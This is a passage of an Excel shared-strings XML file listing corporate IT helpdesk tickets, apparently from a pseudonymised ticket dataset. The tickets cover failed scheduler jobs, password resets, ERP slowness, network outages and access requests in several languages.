    <t xml:space="preserve">job Job_1422 failed in job_scheduler at: 09/17/2016 10:56:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1422 failed in job_scheduler at: 09/17/2016 10:56:00</t>
  </si>
  <si>
    <t>password reset : password_management_tool passwordmanager</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1318 failed in job_scheduler at: 09/17/2016 10:45:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1318 failed in job_scheduler at: 09/17/2016 10:45:00</t>
  </si>
  <si>
    <t>account of thomafghk is disabled</t>
  </si>
  <si>
    <t>ustvaifg hmzfewks</t>
  </si>
  <si>
    <t>hzagqxbf fckwrsdq</t>
  </si>
  <si>
    <t>mobile device activation : company provided</t>
  </si>
  <si>
    <t>fwd: die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom admin</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nsoikcyf.jhybqael@gmail.com_x000D_
_x000D_
bitte um die freischaltung des neuen handy_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>ocgkpayl tzadqijk</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2041 failed in job_scheduler at: 09/17/2016 05:44:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2041 failed in job_scheduler at: 09/17/2016 05:44:00</t>
  </si>
  <si>
    <t>cannot submit engineering_tool to system</t>
  </si>
  <si>
    <t>when trying submit engineering_tool to system have problem, the message error is "not connected with company network"._x000D_
i think i'm already connect with vpn company but if try to submit still get failed. please advise</t>
  </si>
  <si>
    <t xml:space="preserve">not able to submit reports in engineering_tool </t>
  </si>
  <si>
    <t>not able to submit reports in engineering_tool 
contact # :</t>
  </si>
  <si>
    <t>HostName_894 : volume: c:\ label:sys-HostName_894 28385a7b  is over 85% space consumed. space available: 4.1 g</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_894 : volume: c:\ label:sys-HostName_894 28385a7b  is over 85% space consumed. space available: 4.1 g_x000D_
</t>
  </si>
  <si>
    <t>kein internetsignal</t>
  </si>
  <si>
    <t xml:space="preserve">from: itjzudor ybtmorxp 
sent: saturday, september 17, 2016 9:53 am
to: ecwtrjnq jpecxuty
cc: nwfodmhc exurcwkm
subject: *** sehr wichtig*** kein internetsignal
importance: high
hallo hartghymutg,
meine internetleitung geht mal wieder nicht.
anschluss 
kein signal eingang, kein w-lan.
wo kann ich anrufen, bzw. wer unterstÃ¼tzt mich ?
danke fÃ¼r deine info.
mit freundlichen grÃ¼ÃŸen | best </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1329 failed in job_scheduler at: 09/17/2016 03:13:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1329 failed in job_scheduler at: 09/17/2016 03:13:00</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019fail failed in job_scheduler at: 09/17/2016 03:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail failed in job_scheduler at: 09/17/2016 03:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_303 failed in job_scheduler at: 09/17/2016 03:01:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_303 failed in job_scheduler at: 09/17/2016 03:01:00</t>
  </si>
  <si>
    <t xml:space="preserve">
name:ganedsght
language:
browser:microsoft internet explorer
email:plznsryi.ikugwqec@gmail.com
customer number:
telephone:
summary:skype not working
</t>
  </si>
  <si>
    <t>all servrs in  job_scheduler are unlinked</t>
  </si>
  <si>
    <t>all serves in  job_scheduler are unlinked._x000D_
not responding while trying to reconnect.</t>
  </si>
  <si>
    <t>HostName_170- swap space on:HostName_170 is 75% or less</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to  engineering tool </t>
  </si>
  <si>
    <t>gxaudkip pgkuwtlv</t>
  </si>
  <si>
    <t>production_order_interface_app server down in india. not able to release production orders</t>
  </si>
  <si>
    <t>production_order_interface_app server down in india. not able to release production orders.</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: phqwmniy.kjucgqom@gmail.com
hello,
while route card release error message appearing  and route card not get printed:
[cid:image003.jpg@01SID_350c5.267b6b30]
required help in resolving the issue,
[cid:image004.png@01SID_350c5.267b6b30]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</si>
  <si>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lygdcfwn sqmebjtf</t>
  </si>
  <si>
    <t>po print out.</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wimozrdc.iodvtuaz@gmail.com
hello ,
please refer the screen shot below. we are not getting po prints. please do the needful.
[cid:image001.png@01SID_350c2.20eb5840]
thanking you,
srinifghvahs.s.
wimozrdc.iodvtuaz@gmail.com&lt;mailto:wimozrdc.iodvtuaz@gmail.com&gt;
www.company.com&lt;
</t>
  </si>
  <si>
    <t>wimozrdc iodvtuaz</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_549 failed in job_scheduler at: 09/16/2016 23:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_549 failed in job_scheduler at: 09/16/2016 23:06:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_39hoti failed in job_scheduler at: 09/16/2016 18:09:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_39hoti failed in job_scheduler at: 09/16/2016 18:09:00</t>
  </si>
  <si>
    <t>lyfrphmz ahidnfmb</t>
  </si>
  <si>
    <t>ticket update on inplant_861120</t>
  </si>
  <si>
    <t xml:space="preserve">password reset on hr_tool and mii </t>
  </si>
  <si>
    <t>dycmlejx iycsvhzl</t>
  </si>
  <si>
    <t xml:space="preserve">unable to get the crm add-in on excel </t>
  </si>
  <si>
    <t>ymorvuwg pejkzvfl</t>
  </si>
  <si>
    <t>password reset to login to collaboration_platform and check paystub</t>
  </si>
  <si>
    <t>vgnpzxbc rbphwimj</t>
  </si>
  <si>
    <t>user wants to download software shared with him from collaboration_platform.</t>
  </si>
  <si>
    <t>user wants to download software shared with him from collaboration_platform._x000D_
-connected to the user system using teamviewer._x000D_
-help the user download the software on the local system._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>the correct delivery dates are not showing on the schedule lines and the output</t>
  </si>
  <si>
    <t>so# 35035632 is set up to ship 2nd day air which would be 9/20/16; however, erp is showing a delivery date of 9/21 (3 days)._x000D_
quote 3116244166 was entered with next day air shipping.  the delivery date should be 9/16/16, but it is 9/20/16._x000D_
quote 3116230798 was entered with next day air shipping.  the delivery date should be 9/13/16, but it is 9/19/16.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kxsceyzo.naokumlb@gmail.com_x000D_
_x000D_
i have a user that decided that she need to have her office turned 180 degrees. this means her phone is in another port. i managed to get it powered by using a poe injector. but currently her phone won't sync. her extension is 1223 and the mac address is 00.04.f2.d5.5b.aa._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>erp log in</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: idkfgcnq.vjwhmzor@gmail.com
can you please unlock my erp. my password was not working after i changed it.
vyjmlain hvjbmdgi
senior technical service rep
inside-sales@company.com&lt;mailto:inside-sales@company.com&gt;
</t>
  </si>
  <si>
    <t>idkfgcnq vjwhmzor</t>
  </si>
  <si>
    <t>erro programdntya docad - rj</t>
  </si>
  <si>
    <t>user: olghiveii
erro ao acessar programdntya docad:
"unavailable database"</t>
  </si>
  <si>
    <t>slight change to desktop</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: crkdjbot.qiztrxne@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
is there a way to remove this information from my desktop screen?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">call from vitalyst : opportunities are not editable </t>
  </si>
  <si>
    <t xml:space="preserve">call from vitalyst : opportunities are not editable_x000D_
check screen shot._x000D_
_x000D_
so we are required to use and enter our customer, lead and opportstorage_product data into crm. we understand, but when we do this, many times the actual data entry fields are locked to us, we cannot enter anything. also the flow of the screen and the lack of any intuitive input is very much challenging! _x000D_
this is true on the opportstorage_product screens, also the lead screens, etc.  </t>
  </si>
  <si>
    <t>laptop _ screen problem.</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rohjghit.kumghtwar@company.com
dear it team ,
i am face problem in my laptop screen, there is vertical line strips are coming on screen from today .  refer below pic..
earlier also i was facing this problem but it was not permanent but from today its continue on screen. kindly look into itâ€¦
[cid:image001.jpg@01SID_3506f.3653c6c0]
rohjghit kumghtwar
application engineering
rohjghit.kumghtwar@company.com&lt;mailto:rohjghit.kumghtwar@company.com&gt;
</t>
  </si>
  <si>
    <t>admin access</t>
  </si>
  <si>
    <t>need the administrator access for user  vijghyduhprga yeghrrajghodu  to install the dac software</t>
  </si>
  <si>
    <t>the interface ethernet13/5(port-channel to fluke trueview appliance) on '28.70.69.134'intermittenly going down.</t>
  </si>
  <si>
    <t xml:space="preserve">the interface ethernet13/5(port-channel to fluke trueview appliance) on '28.70.69.134'(company-dc-nx7018.company.com) is going down intermittently._x000D_
</t>
  </si>
  <si>
    <t>9401555132 &amp; 0512667163 vat not tally</t>
  </si>
  <si>
    <t xml:space="preserve">from: raghyvhdra najuty 
sent: friday, september 16, 2016 4:50 pm
to: nwfodmhc exurcwkm
cc: srinfhyath araghtyu; parthyrubhji erathyur; hdfvbjoe obvrxtya; raghjkavhjkdra rao
subject: dan - re: 0512666243 &amp; 0512667163 vat not tally
please refer    below mail  which mentions  that  vat does not tally in the inwarehouse_tools no.0512666243 dated:-16/08/2016 and inwarehouse_tool no.0512667163 dated:-18/08/2016
i had raised similar ticket   last  week for some other  inwarehouse_tools  .  we are  coming across  such  issues  frequently and  request you  to ensure  that   this type of error  is not repeated  .
</t>
  </si>
  <si>
    <t>can you please check the bobj account of stefdgthy. he gets the enclosed error message when trying to open a bobj report</t>
  </si>
  <si>
    <t xml:space="preserve">dear all,_x000D_
_x000D_
can you please check the bobj account of wohzmlib fxwjhapo. he gets the enclosed error message when trying to open a bobj report._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>wohzmlib fxwjhapo</t>
  </si>
  <si>
    <t>one note issue : file not getting synched.</t>
  </si>
  <si>
    <t>one note issue : file not getting synched._x000D_
logged out and trying logging in back, no go._x000D_
checked if other user are able to sync , no issues with other users.</t>
  </si>
  <si>
    <t>orvwshat acpgvixj</t>
  </si>
  <si>
    <t>name:ljztkmds ltjkirwy
language:
browser:microsoft internet explorer
email:ljztkmds.ltjkirwy@gmail.com
customer number:
telephone:
summary:cannot access printers in the usa plant. acts like i need to install driver, but then does not give me access to HostName_837.never had issues in the past. not sure if permissions changed when changes positions.</t>
  </si>
  <si>
    <t>ljztkmds ltjkirwy</t>
  </si>
  <si>
    <t>change mm packages from plant_248 bom's</t>
  </si>
  <si>
    <t xml:space="preserve">hi team_x000D_
_x000D_
we need the items related below, must be replaced for the new packages filled in the plant_248 bom's_x000D_
._x000D_
current 6092194 - change by 7309918_x000D_
current 6092195 - change by 7309918_x000D_
current 6092196 - change by 7309919_x000D_
current 6092197 - change by 7309910_x000D_
current 6092101 - change by 7309910_x000D_
._x000D_
</t>
  </si>
  <si>
    <t>zuyimtsf qjtimdsp</t>
  </si>
  <si>
    <t xml:space="preserve">unable to get audio on skype meeting </t>
  </si>
  <si>
    <t>entering power save mode : external monitor</t>
  </si>
  <si>
    <t>ixefmkyb bkyfisxz</t>
  </si>
  <si>
    <t>stop hr jobs</t>
  </si>
  <si>
    <t xml:space="preserve">hi tim,_x000D_
_x000D_
please stop the attached hr jobs with immediate effect._x000D_
hr160_x000D_
hr180_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>expense report error - manager needs authorization</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ifblxjmc.dyrgfwbm@gmail.com
hello,
spqrtkew vpmnusaf needs authorization to approve expense reports for sqmabtwn fchijage.  one team is correct with sqmabtwn fchijage reporting to avigtshay.  the expense side just needs updated.
below is the error he is getting.
</t>
  </si>
  <si>
    <t xml:space="preserve">when trying to login to ethics, user gets the following error_x000D_
_x000D_
welcome to the company business ethics &amp; conduct center_x000D_
(ethics) training site. our records indicate that the log-in_x000D_
credentials you used to access this site from the company's_x000D_
collaboration_platform do not match the records we have on file within the_x000D_
active directory. please submit a ticket to the global support_x000D_
center to ensure that your network log-in id is correctly entered_x000D_
</t>
  </si>
  <si>
    <t>uwiqchfp hnsukjma</t>
  </si>
  <si>
    <t xml:space="preserve">install aiqjxhuv dceghpwn viewer </t>
  </si>
  <si>
    <t xml:space="preserve">install aiqjxhuv dceghpwn viewer ._x000D_
._x000D_
software available at p:\ drive in the \temporary\aiqjxhuv dceghpwn viewer subdirectory.   </t>
  </si>
  <si>
    <t>urgent request to complete your requirement          fy17 q1  ethics module - working together:  promoting mutual respect</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
please advise, undeliverable e-mail.  is this person still with company?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1967b failed in job_scheduler at: 09/16/2016 10:59:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1967b failed in job_scheduler at: 09/16/2016 10:59:00</t>
  </si>
  <si>
    <t>not able to lopgin to collaboration_platform using email address.</t>
  </si>
  <si>
    <t>not able to login to collaboration_platform using email address._x000D_
changes settings in extension attribute editor15 and asked user to login after some time</t>
  </si>
  <si>
    <t>alfqhigv zofjibkr</t>
  </si>
  <si>
    <t xml:space="preserve"> ship-to # 81051078 created / not visible in erp</t>
  </si>
  <si>
    <t xml:space="preserve">from:  customermaster 
sent: friday, september 16, 2016 7:14 pm
to: repyzajo lxfwopyq;  customermaster; nwfodmhc exurcwkm
cc: fctmzhyk cznlfbom
subject: amar re: ship-to # 81051078 created / not visible in erp
importance: high
it,
ship to account # 81051078 was created in crm over 3 hrs ago and is still not visible in ecc (SID_34).  all required fields are completed.  please advise why this account has not replicated to SID_34.  this account is needed for additional actions!!
nkthumgf mwgdenbs
nkthumgf.mwgdenbs@gmail.com
ph: 
from: repyzajo lxfwopyq 
sent: friday, september 16, 2016 6:44 am
to:  customermaster
cc: fctmzhyk cznlfbom
subject: ship-to # 81051078 created / not visible in erp
importance: high
hello customer master team,
we have created a new ship-to address # 81051078 for the sold-to #81034820 under 1278/01/03. 
the account is set up correctly and visible in crm, but after few hours it is still not visible in erp.
could you please help ?
best </t>
  </si>
  <si>
    <t>solicito a instalaÃ§Ã£o de software adobe acrobat</t>
  </si>
  <si>
    <t>solicito a instalaÃ§Ã£o do software adobe acrobat para a manutenÃ§Ã£o e criaÃ§Ã£o de documentos diversos como, importaÃ§Ã£o e exportaÃ§Ã£o.</t>
  </si>
  <si>
    <t>vhjkdqop tkhafgrc</t>
  </si>
  <si>
    <t>analysis for office - hana - access (1 user out of 3 without access to hana)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uzpycdho.hdswinlo@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
within the european pricing team we are experiencing for some users troubles in getting the right connection to business explorer hana._x000D_
_x000D_
you will receive a couple of tickets in showing what the error / behavior is and hope for you a quick resolution from you._x000D_
_x000D_
user: uylvgtfi eovkxgpn, germany location_x000D_
_x000D_
attachment:_x000D_
set of instruction we are using_x000D_
error log_x000D_
and screenshot below._x000D_
_x000D_
setup of the machine has been completed through local it._x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>vendor and customer balance in local currency list(sÂ­_alr_98123193 and s_alr_98123283)</t>
  </si>
  <si>
    <t xml:space="preserve">help desk,_x000D_
_x000D_
in fy2017, the end of month balance in s_alr_98123193 is different from the trial balance in f.01. _x000D_
previous month end of balance is zero in s_alr_98123193._x000D_
_x000D_
under the same conditions in fy2016, previous month end of balance appear._x000D_
and the end of month balance match between  s_alr_98123193 and f.01._x000D_
_x000D_
what is the cause?_x000D_
</t>
  </si>
  <si>
    <t>erp access issue : passward re-set for SID_4</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_4
enter user id of user having the issue: arrojhsjd
transaction code(s) the user needs or was working with:
describe the issue:
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket.
provide access the same as this other user:</t>
  </si>
  <si>
    <t>wireless is not working.</t>
  </si>
  <si>
    <t>rbzymfvx lebqthwv</t>
  </si>
  <si>
    <t>htoqbljx dkbatgus</t>
  </si>
  <si>
    <t>need access to shop_floor_app corrected</t>
  </si>
  <si>
    <t>i don't have the access to update work centers in shop_floor_app.  i don't have access to the system tab in shop_floor_app.  it looks like i am missing some items</t>
  </si>
  <si>
    <t>chkmejsn lvidgknc</t>
  </si>
  <si>
    <t xml:space="preserve">virus issue /google maps issue </t>
  </si>
  <si>
    <t>ieybdzvf spxekdic</t>
  </si>
  <si>
    <t>johghajknn needed information about passwords.</t>
  </si>
  <si>
    <t>unable to launch engineering tool</t>
  </si>
  <si>
    <t>name:stefyty hipghkinjyt
language:
browser:microsoft internet explorer
email:zikuvsat.spxycizr@gmail.com
customer number:
telephone:
summary:engineering tool has failed to load. 
error log available, but too large to paste here.</t>
  </si>
  <si>
    <t>zikuvsat spxycizr</t>
  </si>
  <si>
    <t>ujbaemlc ilzhrxjo</t>
  </si>
  <si>
    <t>explanation about password manager is required.</t>
  </si>
  <si>
    <t>unable to connect to wireless.</t>
  </si>
  <si>
    <t>cjexkmoz jsikovzd</t>
  </si>
  <si>
    <t>mjvfxnka zvjxuahe is not able to add campaign "global hard machining" to his opportunities</t>
  </si>
  <si>
    <t xml:space="preserve">when user adds the above campaign to an opportstorage_product and hits save  crm delivers the error that he does not have privilages to perform this action. log file and screenshot attached. _x000D_
eva_x000D_
</t>
  </si>
  <si>
    <t>install pdfmailer \ahlqgjwx wbsfavhg</t>
  </si>
  <si>
    <t>ahlqgjwx wbsfavhg</t>
  </si>
  <si>
    <t>password change , no outlook</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xkegcqov.drctxjqi@gmail.com_x000D_
_x000D_
changed my password this morning now i cannot open outlook._x000D_
this happened last time also, it was a crm issue that happens when password is changed._x000D_
_x000D_
high importance_x000D_
_x000D_
_x000D_
_x000D_
xkegcqov drctxjqi_x000D_
 application engineer - cmp_x000D_
industrial segment_x000D_
xkegcqov.drctxjqi@gmail.com_x000D_
m 1-229-300-4142_x000D_
t 1-800-446-7738_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>installl bex analysis add in</t>
  </si>
  <si>
    <t>laptop battery needs to replaced aerp:service tag:dd9p882</t>
  </si>
  <si>
    <t>my laptop battery needs to be replaced aerp. battery backup is very poor  laptop is powering off when i remove it from docking station._x000D_
service tag:dd9p882_x000D_
laptop model:dell latitude e5450</t>
  </si>
  <si>
    <t>no 'originals' for dir71805607 - manufacturing waiting</t>
  </si>
  <si>
    <t>there have been no 'original' files created for dir71805607.  it is fr.  production is on hold waiting for these files.</t>
  </si>
  <si>
    <t>an der maschine 15 (agathon combi) funktioniert die netzwerkverbindung nicht</t>
  </si>
  <si>
    <t xml:space="preserve">hallo _x000D_
_x000D_
an der maschine 15 (agathon combi) funktioniert die netzwerkverbindung nicht._x000D_
kannst du bitte einmal nachschauen?_x000D_
_x000D_
danke_x000D_
_x000D_
gruÃŸ_x000D_
                marftgytin_x000D_
</t>
  </si>
  <si>
    <t>vfuytnwp fyzhntag</t>
  </si>
  <si>
    <t>unable to install engineering_tools</t>
  </si>
  <si>
    <t>unable to install engineering_tools. 
t +</t>
  </si>
  <si>
    <t>jzksvdtb czvlsmqx</t>
  </si>
  <si>
    <t>inc1551048 - ticket update</t>
  </si>
  <si>
    <t>skype audio issue</t>
  </si>
  <si>
    <t>other person unable hear my warehouse_tool on skype call.</t>
  </si>
  <si>
    <t>space requirement in grinding drive</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vkzwibco.pueyvhoi@gmail.com_x000D_
_x000D_
dear sir/madam,_x000D_
_x000D_
the space available in grinding drive is only 791 mb. please provide additional space in the drive at the earliest._x000D_
_x000D_
[cid:image001.png@01SID_35033.4c7cf5c0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>vkzwibco pueyvhoi</t>
  </si>
  <si>
    <t>network outage:india - india ():vpn circuit is down since at 5:49 am et on 09/16.no backup</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _____5:49 am et on 09/16_________________x000D_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__email_______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</si>
  <si>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need telephony_software to be installed on ebhl8111136 - xwgnvksi dwijxgob - urgent csr cannot take calls</t>
  </si>
  <si>
    <t>need telephony_software to be installed on ebhl8111136 - xwgnvksi dwijxgob
please contact karghyuen via skype for remote installation
(zmgsfner caltmgoe - phone: )</t>
  </si>
  <si>
    <t>call to check if hybegvwo dbgrtqhs account is disabled</t>
  </si>
  <si>
    <t>re: revised prices - local</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ryculmsd.wofgvkrb@gmail.com
hi ;
can we just make sure of these facts â€“ please.
please can you confirm if this customer has a valid statement as he is complaining  about our service and response to his mail and info forwarded to him .
please just copy me in with your comments.
janhytrn ooshstyizen
sales manager - construction sa
ryculmsd.wofgvkrb@gmail.com&lt;mailto:ryculmsd.wofgvkrb@gmail.com&gt;
new road king bit catalog:    
from: johan kok [mailto:johan.kok@in-corp.com]
sent: friday, september 16, 2016 10:51 am
to: jofghan kddok &lt;jofghan.kddok@alphastdgtyal.com&gt;; janhytrn ooshstyizen &lt;ryculmsd.wofgvkrb@gmail.com&gt;; 'hennidgtydhyue booysen' &lt;hennidgtydhyue.booysen@es.co.za&gt;
subject: re: revised prices - local
hi jan,
i did request this before. please could you ensure that your e-mail administrator (wherever in the world he sits), could fix the below:
this message was created automatically by mail delivery software.
a message that you sent could not be delivered to one or more of its recipients. this is a permanent error. the following address(es) failed:
  ryculmsd.wofgvkrb@gmail.com&lt;mailto:ryculmsd.wofgvkrb@gmail.com&gt;
    host company-com.mail.protection.outlook.com [207.46.163.247]
    smtp error from remote mail server after rcpt to:&lt;ryculmsd.wofgvkrb@gmail.com&lt;mailto:ryculmsd.wofgvkrb@gmail.com&gt;&gt;:
    550 5.7.1 service unavailable, client host [154.0.170.195] blocked using customer block list (as27123718)
</t>
  </si>
  <si>
    <t>ryculmsd wofgvkrb</t>
  </si>
  <si>
    <t>wunderlist add in</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bmudkpie.qolrvbip@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i use a microsoft mobile phone and in the outlook for the mobile are no tasks available._x000D_
_x000D_
can we use wunderlist add in ?_x000D_
_x000D_
there is an app for it and an outlook add in, but it's not starting._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">ich sehe meine reisekostenabrechnungen in erp nicht mehr (transaktion pr05). </t>
  </si>
  <si>
    <t xml:space="preserve">ich sehe meine reisekostenabrechnungen in erp nicht mehr (transaktion pr05). es kommt die meldung infotype '0017' for 01.09.2016 does not exist for pers. no._x000D_
</t>
  </si>
  <si>
    <t>we are not getting communication in to attendance_tool system from the following clocks.  request you to check on priority.</t>
  </si>
  <si>
    <t>drucker tauschen ( we39 und we75 ) \gogtyek</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ustvaifg.hmzfewks@gmail.com
hello
someone has disabled the ad account of hybegvwo dbgrtqhs / thomafghk 2 days ago.
could you please reactivate it and tell us why it was disabled.
 has changed the location from switzerland to germany, but he is still an employee.
michghytuael (as the manager of hybegvwo dbgrtqhs) or mathyuithihyt (as the director hr) please confirm that  is still working for company.
</t>
  </si>
  <si>
    <t xml:space="preserve">probleme mit  outlook \ engracia.gonzales-fernandez  </t>
  </si>
  <si>
    <t>kpobysnc tqvefyui mail box needs to be approved nad then uacyltoe hxgaycze and enable</t>
  </si>
  <si>
    <t xml:space="preserve">please approve the mailbox of kpobysnc tqvefyui user in following environments:_x000D_
uacyltoe hxgaycze:- _x000D_
tempdev-_x000D_
train-_x000D_
prod-_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ungoxpdc hmxwuyog</t>
  </si>
  <si>
    <t xml:space="preserve">our colleagues have opened a ticket about the same issue that spain (sales org 1248 ) and portugal (sales org 1406) have. _x000D_
_x000D_
ticket  inc1551906 _x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>gwfozprc kldrsnze</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_512 failed in job_scheduler at: 09/16/2016 04:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
9/16/2016 3:07:31 am :: error: cannot authenticate user._x000D_
soap fault. detail: '', endpoint: ''_x000D_
soap connection is not available. connection id: [HostName_1018.company.company.com]._x000D_
failed to create nfc download stream. nfc path: [nfc://conn:HostName_1018.company.company.com,nfchost:host-30668,stg:datastore-63448@HostName_919/HostName_919.vmx]._x000D_
 _x000D_
job Job_512 failed in job_scheduler at: 09/16/2016 04:20:00</t>
  </si>
  <si>
    <t xml:space="preserve">network access for vahjtusa wenghtyele for fÃ¼rth network drive is required </t>
  </si>
  <si>
    <t xml:space="preserve">folder :; \\eagcldaten\teams\gpc
access read and write
user id weghyndlv </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 09/16/2016 04:21:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
[critical] from: bda-net@lhqSID_1840.company.company.com "lhqSID_1840.company.company.com [/e]"  time: 9/16/2016 4:20:04 am_x000D_
 ipc failure reading net message (ipc read error_x000D_
 system error: [10054] connection reset by peer_x000D_
) =&gt; aborting._x000D_
_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 09/16/2016 04:21:00</t>
  </si>
  <si>
    <t>network outage:usa mi :brembo: site hard down since at 9/16/2016 4:04 am et</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    __no_______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ___9/16/2016 4:04 am et________________x000D_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___na___    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ____na____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ___na______     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ___na________   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ____na_______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ___no____     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000D_
_x000D_
12. notified  gsc  ____na____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>probleme mit erpgui \vsdtxwry ngkcdjye</t>
  </si>
  <si>
    <t>vsdtxwry ngkcdjye</t>
  </si>
  <si>
    <t>many users in our germany location (earlier germany) are complaining of response time issues in erp</t>
  </si>
  <si>
    <t>we are experiancing slow response times in our location in erp. various transactions ( va01, va02, va21, va22, md04 etc. i am currentlyx on server axhg30335 and mine is ok but others complain.  as i was on server HostName_197 i experienced also issues.  i have heard of at least 3 servers with issues HostName_197,30331 and 30338. please check network or connection and advise.</t>
  </si>
  <si>
    <t>erp zload - releasing orders in vSID_62 take much too long - please check!</t>
  </si>
  <si>
    <t>the erp response time, especially out of zload takes much too long.
anfghyudrejy</t>
  </si>
  <si>
    <t>kmtpzyre mqlsfkre</t>
  </si>
  <si>
    <t>erp performance</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ctvaejbo.mjcerqwo@gmail.com
hi,
we're noticing very slow performance with erp at the uk facility,
pollaurid d phlpiops
manager engineering technology
</t>
  </si>
  <si>
    <t>erp is slow in multiple locations : poland , united kingdom, germany</t>
  </si>
  <si>
    <t>erp is slow._x000D_
internet is running fine._x000D_
other applications (outlook etc) are running fine._x000D_
many users are affected.</t>
  </si>
  <si>
    <t xml:space="preserve">laptop not use audio </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: yjwivxsh.fcetobrj@gmail.com_x000D_
_x000D_
dear it team_x000D_
_x000D_
my laptop can't use audio file and not sound._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>erp is slow for few users at poland office.</t>
  </si>
  <si>
    <t>erp is slow for few users at poland office._x000D_
not all users impacted.</t>
  </si>
  <si>
    <t xml:space="preserve">how did you determine there are network problems ? all system are very slowly_x000D_
_x000D_
is only erp slow ? (please use the quick ticket within the erp folder if only erp is running slow) no_x000D_
_x000D_
are more than one transactions impacted? yes_x000D_
_x000D_
what erp server are you on (server name is located in the status bar at the bottom _x000D_
right of your screen) ?    apo-server, EU_tool server etc._x000D_
_x000D_
do other co-workers also notice slow response times ?  yes, many colleagues in plant_228_x000D_
_x000D_
what other applications are running slow ? EU_tool, erp, print drawings, create delivery notes, EU_tool _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2645 failed in job_scheduler at: 09/16/2016 03:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2645 failed in job_scheduler at: 09/16/2016 03:25:00</t>
  </si>
  <si>
